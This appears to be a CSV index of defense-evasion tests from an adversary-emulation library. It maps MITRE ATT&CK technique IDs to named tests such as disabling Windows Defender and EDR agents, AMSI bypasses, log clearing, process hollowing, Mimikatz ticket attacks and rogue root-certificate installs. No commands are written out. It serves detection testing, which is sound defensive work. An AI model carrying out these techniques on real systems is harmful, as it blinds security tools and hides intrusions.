defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
